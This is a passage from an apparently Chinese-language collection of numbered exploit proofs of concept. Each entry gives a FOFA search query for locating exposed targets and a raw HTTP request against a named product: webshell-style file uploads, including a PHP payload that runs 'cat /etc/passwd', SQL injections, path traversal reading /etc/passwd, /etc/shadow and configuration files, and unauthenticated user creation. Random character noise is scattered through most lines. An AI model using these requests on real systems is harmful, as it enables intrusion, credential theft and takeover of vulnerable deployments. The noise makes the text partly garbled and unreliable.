3 k5 w4 h5 S$ [ `7 R2 Qhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
2 b. B% n5 A$ H$ [8 V" Qxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
$ Z3 g# Q, X7 j<soap:Body>
B0 u+ C5 y/ }) ^9 U<UploadResume xmlns="http://tempuri.org/">
+ X. m0 B% e$ d2 A o4 w4 Y0 Z<ip>1</ip>6 J) ~7 r0 O: A' `8 F
<fileName>../../../../dizxdell.aspx</fileName>6 k. L. I1 j* z' l' e
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>9 t( W1 @9 T9 c& @- T
<tag>3</tag>7 U9 r3 J* q* O8 E& d2 I
</UploadResume>5 L' h: I. }7 R" i0 y# d
</soap:Body>
. t5 W- R# N) y+ a u</soap:Envelope>8 J* t8 Z$ s5 n6 j; [: R, L. V( ^
) C7 D" R. e( L. f: p- t7 _
0 p; L0 S0 F6 O
http://x.x.x.x/dizxdell.aspx
! q/ C/ ^. q# P/ E) c3 Y0 v
8 \) J3 P# s* E; t; O$ F5 H+ K162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
8 T4 s5 n7 D+ { aFOFA: app="和丰山海-数字标牌"8 p2 @/ S: z; |! v
POST /QH.aspx HTTP/1.14 X: K8 B5 F2 U- ?) \8 u6 H
Host: x.x.x.x
) q2 _0 \0 I% Y+ ^" ^& ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0+ l2 |$ I7 \& ]& f/ e
Connection: close. h; t) g3 m, `) ^" H, ]5 i& @
Content-Length: 5835 `9 ~0 }. m! I, u7 c. H
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey& k- T9 o% G# f
Accept-Encoding: gzip7 S- G0 j6 Z7 q: [& w
. t' i: V7 J, n5 c3 R$ |; K& a0 m5 U2 ~
------WebKitFormBoundaryeegvclmyurlotuey S: e/ `. p& u6 [" w9 d0 u- O
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"+ \$ ? Y( o9 _3 h" f( K
Content-Type: application/octet-stream' M9 T. E: B8 M7 Y5 l. x2 d% R
) T: g& w; {3 W+ `5 ^* `6 J
<% response.write("ujidwqfuuqjalgkvrpqy") %>
# z$ O+ ^" E, _. o# h------WebKitFormBoundaryeegvclmyurlotuey$ J5 K R* z# `0 N% y
Content-Disposition: form-data; name="action"; g% ?; h2 u+ K6 N8 n
/ j( K6 ~* e: E6 d9 Aupload, h: t& X2 x$ Z; h! G
------WebKitFormBoundaryeegvclmyurlotuey! K6 l( X0 \7 V2 \# ^7 H% v
Content-Disposition: form-data; name="responderId", f4 Y7 h2 P' q4 c
$ `! h- _# W+ B* U a% g2 V4 \
ResourceNewResponder
2 n4 N# ^' n# Z. @' n------WebKitFormBoundaryeegvclmyurlotuey( ]" w6 \3 A/ G) y& W4 G2 m4 F
Content-Disposition: form-data; name="remotePath"+ e" ]! p# k* P9 R% J1 p- [! B2 s
! t. m. T7 d- D, c" P/opt/resources
1 \, ^" C* Y Y7 [$ R8 p- x------WebKitFormBoundaryeegvclmyurlotuey--5 ^/ ^4 y1 p5 A$ i+ n
/ `% B, M6 h3 S+ U% V% {- Y8 Y: x) S' N5 n+ j- A$ Y- j
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
( ]: k( e2 p/ x% ~
/ }' \6 Y) O. M7 C7 ~% }* ]163. 号卡极团分销管理系统 ue_serve.php 任意文件上传2 ^1 m) `; O8 t% x1 e' E
FOFA: icon_hash="-795291075"9 B8 @7 `8 w! v$ M! [
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
$ E6 D+ P5 [7 q4 ?- f3 DHost: x.x.x.x
6 G2 J; E0 d# b6 G& VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36, n5 j, e" Y: w6 h7 m( ~" ]
Connection: close$ i7 L4 T# ?, W- E/ a1 q, y
Content-Length: 293: G5 d8 L! H, Y7 b
Accept: */*. z6 O- s% i# d6 B* Z$ N N+ ?
Accept-Encoding: gzip, deflate
( W5 d& k9 b( [4 z8 j) ?( RAccept-Language: zh-CN,zh;q=0.98 I/ m: h" H# y4 q, `
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod' p; ~9 g9 W6 B: P2 h7 ~' w
, Q' a. q$ H u6 L------iiqvnofupvhdyrcoqyuujyetjvqgocod
4 F4 N2 A8 Z, t3 b/ b9 zContent-Disposition: form-data; name="name"/ J5 w, j9 ]9 M2 V
( d; ~; B. @8 C. E& V
1.php
7 |6 \6 f, P( x! _, ?------iiqvnofupvhdyrcoqyuujyetjvqgocod6 L# N/ Q8 v/ Z( ?3 J( N
Content-Disposition: form-data; name="upfile"; filename="1.php"
* M2 D- r! w& ~. _; m& xContent-Type: image/jpeg# @; F+ ?5 J" w* d. o& z# ^6 U( @
) [* h6 I" s6 ^' }# W. Drvjhvbhwwuooyiioxega
& i0 F* I" _) n* j- ~------iiqvnofupvhdyrcoqyuujyetjvqgocod--
, x# n2 V9 V$ Q1 J2 P
5 a0 k3 U" a$ X- _, x9 X8 ]' O7 D" H- Z6 `+ f3 `5 O
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传+ j/ u0 }3 F' V4 J: j
FOFA: title="智慧综合管理平台登入"6 I* \, x3 E! @, @
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1 t9 l5 P$ E- Q& f4 Q
Host: x.x.x.x8 m2 m* D' q. Z8 C2 l; d' j5 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
& R( h: @: D+ W, a! ] ]Content-Length: 288
( f- y- C% g1 g$ C: @3 e3 ^( bAccept: application/json, text/javascript, */*; q=0.01
; P; x) L4 A/ Q; T+ L8 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
w9 k+ ?2 _! A; j8 z6 zConnection: close
7 a; h* R8 y3 @ F% DContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl9 ?. o! n0 f. b" M3 n
X-Requested-With: XMLHttpRequest
0 `* @$ `: S0 l$ J( N- X7 rAccept-Encoding: gzip$ j! F9 u7 Q0 m X8 N7 L: K
: a0 _/ L/ i, `+ h+ y8 t------dqdaieopnozbkapjacdbdthlvtlyl( h+ `, \9 k) H( G
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
S# s8 p& w6 ?% XContent-Type: image/jpeg
3 e' U% N( E8 l6 a, W+ }) m5 ~5 Q% l/ d) j$ J
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>2 r9 `. Z- {& Z. n4 i
------dqdaieopnozbkapjacdbdthlvtlyl--
) h" O [: k2 q$ N9 v+ s$ m$ ~3 `( C
7 ~1 I2 I- f* S2 N5 r0 a zhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx, r: x6 s; h( x0 ~9 j& D, Q
: E6 }% n: d* t: k; _1 \165. OrangeHRM 3.3.3 SQL 注入! v2 l& V- k1 c' {) {
CVE-2024-364284 {1 \( F2 P( l, j X2 ]' K
FOFA: app="OrangeHRM-产品"4 }0 s0 [$ X" h3 ^$ r. }
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))8 U) P S" g& r$ \" r+ \
' S; D5 Y. T8 B
* I% q% ?- g6 i, H: J: {2 h0 [166. 中成科信票务管理平台SeatMapHandler SQL注入& B/ T1 t# X7 x3 ^# _
FOFA:body="技术支持:北京中成科信科技发展有限公司"
* M. z/ P8 j2 z8 H! QPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1, N1 q6 x; ? u
Host:( v3 w' z& E9 G/ E/ o7 @) j5 Z
Pragma: no-cache
6 ^+ z9 J4 J3 E) ]Cache-Control: no-cache3 i8 {6 v) k( ?; j' F; D
Upgrade-Insecure-Requests: 1
4 X3 W5 b V* X: p) A: oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36( w' o! [8 K8 ~7 H5 s( \' U2 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 [- |8 V4 [# R4 ?4 }/ ^7 M, n
Accept-Encoding: gzip, deflate# k0 F2 [) c* f" }+ m8 e
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8; O. F. L2 M- v9 B% k
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE4 b& q" X- W- h i( }8 g/ L
Connection: close. r2 r+ o) w) v. B M" ~. [
Content-Type: application/x-www-form-urlencoded
e! ^+ t$ B2 O' I' @! pContent-Length: 89
0 ?* r; @1 t0 R6 S4 w( \6 R/ V( r$ f+ `- V
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
( ^5 f* j, j6 M9 x. [8 K9 n! v, b& J
5 @$ Z$ e' f; h9 Y, G" p% z
167. 精益价值管理系统 DownLoad.aspx任意文件读取7 _. U' s' Q% Z' _" h) z+ a; z
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
1 w4 M( I/ Q6 X" l7 EGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.11 l& N7 z- i% w9 U
Host:
8 t8 F" I* G* X) i8 m% EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 R- D+ `$ M9 l" IContent-Type: application/x-www-form-urlencoded" E9 g; T# W: I9 _/ N- {! V* b8 c
Accept-Encoding: gzip, deflate; O" \5 R( M' O, C" H
Accept: */*
3 r" @" }& q3 ]$ k5 L' WConnection: keep-alive7 c, E$ {8 Z5 _4 \, {( a( w
! M4 Z% z) D$ l' J3 N
6 M/ @/ U8 E/ n. E: g/ e& R K168. 宏景EHR OutputCode 任意文件读取) w5 ^, I' N" h1 R3 C9 Q
FOFA:app="HJSOFT-HCM") `' q s2 ?3 f! r% u; [
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.15 b2 U! O4 k. C& d
Host: your-ip
) W8 m. }4 W) K6 |4 Y0 }* }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
3 [" K) t& z( T* ?- L/ y3 o7 zContent-Type: application/x-www-form-urlencoded3 E A5 ?1 H$ M
Connection: close
, L, @( r* y2 k$ K: q0 {$ u5 S2 ~# N' r6 H5 i: Z
( i: N5 t) ?" h* @
$ J/ O2 C/ r" T0 P169. 宏景EHR downlawbase SQL注入" f8 w# \4 w7 z; {. d* b, j2 B
FOFA:app="HJSOFT-HCM"
. ?) @" v4 e0 ]- P# t" _0 t, p6 jGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
: ]; l( w. n3 J6 [1 {Host: your-ip
8 e$ j1 { b. w* ~! m& t5 I: q; |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ f+ T9 U, N7 r! H3 aAccept: */*
1 R# m& x! R( ]) X. o2 L& ^Accept-Encoding: gzip, deflate
1 R) E4 K! y" L% g) R- yConnection: close6 \9 W; b- \" Z8 h2 q6 G
- s) x" ` l: `& u" H" \
8 H7 }5 t, k4 q/ @ o: X
3 V2 m9 Y# ^0 _+ r. `) {
170. 宏景EHR DisplayExcelCustomReport 任意文件读取: L- b: R. l, H/ j# m; o2 t
FOFA:body="/general/sys/hjaxmanage.js"/ |7 K" {" I2 |; [5 B
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1- a" f% J& H6 S |" s
Host: balalanengliang* S4 G1 Q8 z$ S/ g3 @+ N
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. I: M/ D8 Q; z3 kContent-Type: application/x-www-form-urlencoded
/ i0 ]9 {6 p0 ~% A" t7 c5 p( T ?! }
filename=../webapps/ROOT/WEB-INF/web.xml, V3 J5 _ o* x6 {4 n2 W
' [$ }- k c0 D9 ?4 z' [) g$ d
; C* e- p- s, b" \: p2 }
171. 通天星CMSV6车载定位监控平台 SQL注入
* R6 N# t9 H( n' v/ Y. LFOFA:body="/808gps/"
# L# ~- u5 J3 W% Q7 DGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.15 P% a2 V& I7 @, G' J' E* B
Host: your-ip7 ~+ l. P: m/ N* r/ m, j: d2 m6 u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
, C# s5 z9 s# A5 k8 HAccept: */*+ W2 J1 w. @5 p" l: B9 S; B. r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; c+ Q, j1 F. u% FAccept-Encoding: gzip, deflate
: r7 U/ \9 ^5 B( f0 H! {6 LConnection: close( [3 e( B4 g$ T( Q+ ]& K) ?
8 k5 `8 n) t: F4 P% u5 c. H+ G) E
5 x8 k. A2 o0 r/ m0 V( V
" _; l! r O/ B2 P( ]172. DT-高清车牌识别摄像机任意文件读取8 Q4 V1 X3 L! i* {. m
FOFA:app="DT-高清车牌识别摄像机"6 S* M! N' n( \+ b
GET /../../../../etc/passwd HTTP/1.1
$ [4 f+ d3 A: l* I/ J AHost: your-ip
# `# C+ M3 v" n" {4 H$ _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 k/ Q: K2 W* \& j; B5 sAccept-Encoding: gzip, deflate
( B. W2 S3 W7 l2 s# S; T6 ]( h+ I5 lAccept: */*
* \. Q) E/ A+ D. EConnection: keep-alive
* }- a6 x, K) \* ?
' `7 S& i5 S. P2 K4 y
5 _8 g9 D1 k; P6 j$ C) P' q2 p$ i( R5 _9 I
173. Check Point 安全网关任意文件读取: ^1 h; h" n3 p+ C
CVE-2024-249196 _) P0 C* @/ y! o5 u
FOFA:app="Check_Point-SSL-Network-Extender"( a8 F0 h: e3 v8 d, s4 R
POST /clients/MyCRL HTTP/1.1
! M6 n# s& f; r5 d- zHost: your-ip
7 n8 X9 M' h9 ]# Y" W. z/ tContent-Type: application/x-www-form-urlencoded" a5 ?: d4 Y, d# h% l* H/ d9 j' r2 l
2 U; |& T6 u( ^& A1 ^
aCSHELL/../../../../../../../etc/shadow
% O* b4 W9 {2 [8 `+ [. ]
% d( r8 @9 u5 ?+ M3 x8 }3 a
3 }: q0 d0 D4 i; g7 z) S2 F* v3 [# o6 p/ A& V
174. 金和OA C6 FileDownLoad.aspx 任意文件读取9 R0 ~; N+ M5 A% e0 ]9 ^* a; f
FOFA:app="金和网络-金和OA"7 f* V$ e5 U) A
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
8 A: v: p3 h! C- D8 e' lHost: your-ip) X# d+ [) D* J) e: l7 q ^9 v1 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.366 D3 f3 X3 ]3 J; X+ r% g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 X2 M+ G8 k5 `/ E W& w; m+ o
Accept-Encoding: gzip, deflate, br
9 l; q! ^4 L2 E* E3 k4 L! ?% K. sAccept-Language: zh-CN,zh;q=0.94 f6 _: g! I! d: g# }
Connection: close9 H7 b( S8 u5 @( ]8 l0 d7 V- V& z
+ H* ~+ J* Y$ L' c% A. G1 H, m
) [) S `* t) G' B7 G$ t& m/ m5 m
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入1 f( H% b) s4 k) N5 R. a0 `" q$ J
FOFA:app="金和网络-金和OA"% t( U, w" l; i6 n, \
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.14 O+ m* P& y b* o" I7 o
Host:' l! V7 U# f# v/ P2 E8 K, H. M Q
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% C( U8 y1 i4 ] D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ ?; K# U& ]: b- q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 O Z; _' N/ ^Accept-Encoding: gzip, deflate( Z& i" g' `' Q' T# i
Connection: close, ~3 J( N/ c! \1 L+ | ]# g
Upgrade-Insecure-Requests: 1
' T9 C2 @' }4 Q$ E
& A2 T! p- E$ o8 i8 Q3 O5 q
' P7 G! Q& r4 ~& L/ ]1 y+ A# p176. 电信网关配置管理系统 rewrite.php 文件上传
' Z: H$ r) C- F9 z6 e G/ wFOFA:body="img/login_bg3.png" && body="系统登录"4 ?7 n! y, m+ Z, \; x% Q* }' v
POST /manager/teletext/material/rewrite.php HTTP/1.1% x1 U3 B9 h6 {4 y
Host: your-ip
8 R+ O. R' H2 w) l, _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0/ ?9 B9 d* T# ~3 j, ]1 F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
3 Q9 ~( a0 L# ~Connection: close$ }. i$ F' J. a
" D; Z- Z: T/ X8 g# P% k
------WebKitFormBoundaryOKldnDPT
, ]7 `% [( O: ?: F5 {0 N& h0 kContent-Disposition: form-data; name="tmp_name"; filename="test.php"
! E: [7 t) b9 W8 |Content-Type: image/png
6 x! m' r4 O B7 | 1 e! k, x. f# d& Q2 V
<?php system("cat /etc/passwd");unlink(__FILE__);?>
- {% C3 r* o4 o. z/ D------WebKitFormBoundaryOKldnDPT
1 u0 F+ Y, [, F& P7 TContent-Disposition: form-data; name="uploadtime"
# @. N( Q" _* C, O
' r, o7 O* ~+ Q/ w9 ^( ]% |2 E
5 ^' e! p% O2 j------WebKitFormBoundaryOKldnDPT--
. a; [0 h$ o5 M1 X
5 |2 |, a+ }7 h/ S0 T+ Q I
8 [6 U# h2 Y- f6 n1 A( |. A3 T% _ _: p& \5 A% F1 v: B6 y; ^
177. H3C路由器敏感信息泄露
2 c* D! _7 K7 U3 i/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
" Z4 g* X' {- }3 b$ d* m( m% p3 o/userLogin.asp/../actionpolicy_status/../M60.cfg! s1 G: s" P% g* d- X& B0 @
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
: p- _) F! q8 z. F) d) h/userLogin.asp/../actionpolicy_status/../GR5200.cfg& w4 s8 G- u8 v# B- y
/userLogin.asp/../actionpolicy_status/../GR3200.cfg4 K# p( S5 S9 c+ r
/userLogin.asp/../actionpolicy_status/../GR2200.cfg, H& D0 \$ B, G# `& M! d
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
2 J Z- C# ~9 Q8 ?7 e6 T- t. |/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg4 o& s) h$ D7 }7 G4 k
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg+ H6 L( l! Z( L) ^
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
" S: y. `8 k# L- W) c/userLogin.asp/../actionpolicy_status/../ER5200.cfg
8 j) g4 g4 I2 S: D& B/ J+ \, h/userLogin.asp/../actionpolicy_status/../ER5100.cfg O/ Z7 V u8 D! n+ d, u
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
5 P" N* S" }% G- W7 t/ K8 G& b/userLogin.asp/../actionpolicy_status/../ER3260.cfg0 d; _4 w1 w0 {3 A2 X
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
) \6 @# K, ?6 o! [( ]% P7 v" J; G/userLogin.asp/../actionpolicy_status/../ER3200.cfg
+ h. F3 a1 R8 e3 L- S' \% Q5 [/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg, ?' R+ k/ ]1 c
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg: W2 V' O: O7 J; n: O( I
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg. D0 W: I5 S1 l# @% H6 a2 B7 e
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
& p6 j; G2 S" K+ C+ h/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
0 j7 v, [6 {. [) c( N4 Z I! `! _0 j# Y' o" K
9 N0 W+ I4 C& T& S4 {5 O0 r% I& C
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
- }8 K8 W! j% MFOFA:header="/selfservice"# s( G0 a. v! G4 V% A* m
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1! @- {4 U- q5 E1 J' a A
Host:
: m6 K: D! f% J2 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 U1 s0 a* o& }$ V& T! ^
Content-Length: 2522 ]" G8 k# o- G: {4 W* ^
Accept-Encoding: gzip, deflate0 ~0 f4 g# N7 Y7 \6 k3 H6 k
Connection: close
7 n+ q6 b( ]: X: T5 AContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
; [, [, z& }5 ~, H# v9 T& O+ X-----------------aqutkea7vvanpqy3rh2l6 K a9 V: h$ E# X1 b7 y5 X
Content-Disposition: form-data; name="12234.txt"; filename="12234"9 q: [% A, R9 n* Z6 a7 J: D2 m6 b
Content-Type: application/octet-stream1 x$ x$ b' `7 n
Content-Length: 255
( Z) ^# d7 j/ m% |/ T! P
O0 |8 B4 [6 d, @12234- `) f% a: h; M- }. p0 K
-----------------aqutkea7vvanpqy3rh2l--: p) B: g. T& B2 `4 m
0 C% h# [6 C2 ^- |% g3 f4 c1 W8 z; p$ ~' M {# w
GET /imc/primepush/%2e%2e/flex/12234.txt! m, K2 [/ g7 ^" I( Z8 a
/ {' I, K; x0 V0 A8 e8 J5 B1 e( P
8 p8 i5 P3 }5 N* M; ?' L, o5 y' H- ~179. 建文工程管理系统存在任意文件读取% J8 f4 }) I5 v' B8 k
POST /Common/DownLoad2.aspx HTTP/1.1
8 g- [& ?! A) O' i! RHost: {{Hostname}}$ m7 D) \3 g5 O; j. n$ s
Content-Type: application/x-www-form-urlencoded
2 V4 i- V! `# I p p& u! N: |User-Agent: Mozilla/5.0
- {% M8 J2 N7 Q$ _7 }* w6 f7 _$ L0 Q$ @% s
path=../log4net.config&Name=5 t; [4 \* O$ N9 t6 n7 ~
9 r* z( k, _/ n* ?# W
% l8 e: l1 z& c9 l( K, ^180. 帮管客 CRM jiliyu SQL注入( J/ ^# Z7 _& d+ ^
FOFA:app="帮管客-CRM"
/ e- ~! q0 h O, A- n+ g) M4 sGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
! h+ N0 h$ F: [5 u7 vHost: your-ip
n& ]* V& U9 Z$ ^( \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 [' H6 D4 T0 v, ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 _0 F$ o+ h5 x# \4 c' u# t
Accept-Encoding: gzip, deflate" R& S$ G, W# I: c7 ~
Accept-Language: zh-CN,zh;q=0.9; e3 X, R6 U+ D& U4 q5 e# q1 p e
Connection: close2 T3 O8 m" |1 A9 o
# h6 @5 z1 T% v* [$ D1 E) b* Q: @$ O/ ~& \/ x; a
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入4 }0 o) m! D; `4 x9 E% S
FOFA:"PDCA/js/_publicCom.js"
; u# w$ l) K' U4 jPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
7 v8 y- k* U6 \7 x0 g$ `5 }Host: your-ip
- x2 X2 b3 p) pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36* Q3 X8 ^# F" L6 q: b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. i* p& o, A0 q6 DAccept-Encoding: gzip, deflate, br: r0 H3 X3 m& I# x) l4 S. L
Accept-Language: zh-CN,zh;q=0.9# ~, X, ^1 ?+ X
Connection: close
, g8 [# K% R4 R; n9 [Content-Type: application/x-www-form-urlencoded
0 d! \& A$ s Q7 b1 D% n' o9 ~9 O( l: L5 T
1 a- l$ C* q. R; D5 J+ Naction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20, ?8 l) e# Y5 ^" P% D. u' U9 M W% K) o
: `3 k- V! F n$ n. I0 _/ g6 e4 B: U0 j- N% W d+ g7 w1 @
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
7 M/ n2 ^. x& [* z9 YFOFA:"PDCA/js/_publicCom.js"
. q/ z) I+ c& e; l/ mPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.17 h7 C7 ]9 \; b" y! c- f
Host: your-ip9 l# }* I6 y' b: f5 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
, G/ x. C9 A& l# ~ _. c% oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& h$ C0 E6 F1 d; ]) V0 i# W& o
Accept-Encoding: gzip, deflate, br. }) ?- M$ P" ~
Accept-Language: zh-CN,zh;q=0.9: m9 a2 _5 D% d8 t
Connection: close
2 J7 `/ Z( g2 wContent-Type: application/x-www-form-urlencoded+ h7 s \6 C( F# h) K/ {' I
6 B9 v% h) G3 q4 q5 i: H% k" R
+ u& V5 q2 K5 ^& c) f5 iusername=test1234&pwd=test1234&savedays=1
) s' g- k# L1 H- u5 d7 b6 d- U f/ N% t9 I5 v- F9 P8 `% u
! A4 V# ^6 u, @9 r) r* R
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入: B7 e. A& J( G& n9 K
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"% g+ M# l J( H; E* O
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
: g1 s9 I. r3 D- l! z/ x& Q7 }5 gHost: your-ip
/ C7 Z- F! ^, i8 \User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
f2 s8 v* Q& aAccept-Charset: utf-8! ?! f' m0 k. `: W! ~
Accept-Encoding: gzip, deflate
. B1 X: C$ M" Q# ~6 ?1 N' dConnection: close- Y0 o% y, T3 M% u9 W- R
9 G9 P/ {" i& D+ V" k2 b& J& i+ E d' K `; p$ h+ n3 _1 R
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加9 p& [1 ^, Z# a' g: y
FOFA:server="SunFull-Webs"# W! Y- Y# v! s/ s6 i0 S) K
POST /soap/AddUser HTTP/1.1
$ z! o# q) T+ L8 e2 K& i7 wHost: your-ip
' a8 q6 E9 R$ \ zAccept-Encoding: gzip, deflate
8 p- H: Y! G1 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.05 R H* D; e# J& M7 }* o# d
Accept: application/xml, text/xml, */*; q=0.01
) H0 n" O) K" I0 p: [6 JContent-Type: text/xml; charset=utf-8
@2 \ U) h. N- m2 p% m: `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ F1 @7 u! y- rX-Requested-With: XMLHttpRequest
